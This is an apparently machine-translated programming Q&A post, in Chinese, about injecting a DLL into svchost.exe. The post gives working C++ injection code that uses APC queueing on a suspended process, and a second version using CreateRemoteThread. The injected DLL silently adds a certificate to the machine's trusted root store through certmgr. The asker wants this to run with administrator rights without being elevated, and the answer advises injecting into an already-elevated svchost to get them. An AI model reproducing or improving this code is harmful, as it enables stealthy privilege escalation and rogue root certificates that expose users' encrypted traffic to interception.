不幸的是我有关于注射svchost的问题。代码看起来像这样:
#include "Injection.h"
#pragma once
#include <Windows.h>
DLLInjection::DLLInjection()
{
}
void DLLInjection::InjectDLLTosvchost(LPSTR dllPath)
{
STARTUPINFO si = {};
PROCESS_INFORMATION pi = {};
HMODULE k32 = GetModuleHandle("kernel32.dll");
CreateProcess(NULL, "svchost.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
HANDLE mem = VirtualAllocEx(pi.hProcess, NULL, 260, MEM_COMMIT | MEM_RESERVE , PAGE_READWRITE);
WriteProcessMemory(pi.hProcess, mem, dllPath, 260, NULL);
QueueUserAPC((PAPCFUNC)GetProcAddress(k32, "LoadLibraryA"), pi.hThread, (ULONG_PTR)mem);
QueueUserAPC((PAPCFUNC)GetProcAddress(k32, "ExitThread"), pi.hThread, 0);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
DLLInjection::~DLLInjection()
{
}
执行的dll看起来非常像:
#pragma once
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include "funkcje.h"
#include <iostream>
#include <shellapi.h>
#include <windows.h>
#include <tchar.h>
using namespace std;
void Hello()
{
MessageBox(NULL, (LPCWSTR)L"poczatkowy messagebox", (LPCWSTR)L"Tytul messagebox", MB_ICONINFORMATION);
char bufor[512];
sprintf(bufor, " -add -all -c \"c:\\Users\\Damian\\Desktop\\wwwtesthttpdev.crt\" -s -r LocalMachine root");
wchar_t bufor2[200];
mbstowcs(bufor2, bufor, strlen(bufor) + 1);
LPWSTR ptr = bufor2;
STARTUPINFO startInfo = { 0 };
PROCESS_INFORMATION processInfo = { 0 };
BOOL bSucces = CreateProcess((LPWSTR)(L"c:\\Program Files\\Microsoft SDKs\\Windows\\v7.1A\\Bin\\certmgr.exe"), ptr, NULL, NULL, 0, 0, NULL, NULL, &startInfo, &processInfo);
if (bSucces)
{
cout << "Process Started" << endl
<< "Process ID: " << processInfo.dwProcessId << endl;
}
else
{
cout << "Error to start a process " << GetLastError() << endl;
}
MessageBox(NULL, (LPCWSTR)L"koncowy messagebox", (LPCWSTR)L"Tytul messagebox", MB_ICONINFORMATION);
cin.get();
}
并且dll正在加载正常,因为我确实有两个消息框(一个在执行createProcess命令之前和一个之后),但问题是我没有成功生成certmgr.exe命令的权限(并且它返回certmgr不成功的消息。如果我用管理员权限打开程序,一切正常。但它不应该那样工作。我试图加入svchost进程,该进程应具有管理员权限,但尽管如此我仍然没有权利。任何人都可以帮我回答这个问题我如何让我的程序通过Dllmain中执行的函数的管理员权限。 先感谢您!! the error with certmgr
我也试过OpenProcess:
bool Process::InjectDll(char * dllName, unsigned int processID)
{
HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
if (pHandle == INVALID_HANDLE_VALUE)
return false;
void * address = VirtualAllocEx(pHandle, NULL, strlen(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!WriteProcessMemory(pHandle, address, (LPVOID)dllName, strlen(dllName), NULL))
return false;
HMODULE hK32 = GetModuleHandle("Kernel32");
HANDLE tHandle = CreateRemoteThread(pHandle, NULL, 0,
(LPTHREAD_START_ROUTINE)GetProcAddress(hK32, "LoadLibraryA"),
address, 0, NULL);
WaitForSingleObject(tHandle, INFINITE);
DWORD dllAddress;
GetExitCodeThread(tHandle, &dllAddress);
CloseHandle(tHandle);
VirtualFreeEx(pHandle, address, 0, MEM_RELEASE);
tHandle = CreateRemoteThread(pHandle, NULL, 0,
(LPTHREAD_START_ROUTINE)GetProcAddress(hK32, "FreeLibrary"), (void*
)&dllAddress, 0, NULL);
WaitForSingleObject(tHandle, INFINITE);
CloseHandle(tHandle);
return true;
}
但它也不起作用
答案 0 :(得分:0)
使用CreateProcess您正在使用默认安全描述符(来自MSDN)运行svchost的其他实例:
如果lpProcessAttributes为NULL或lpSecurityDescriptor为NULL,则进程获取默认安全描述符
似乎这些特权不足以运行certmgr。
相反,如果您的注射器使用OpenProcess并注入已经升高的svchost,您就可以运行certmgr。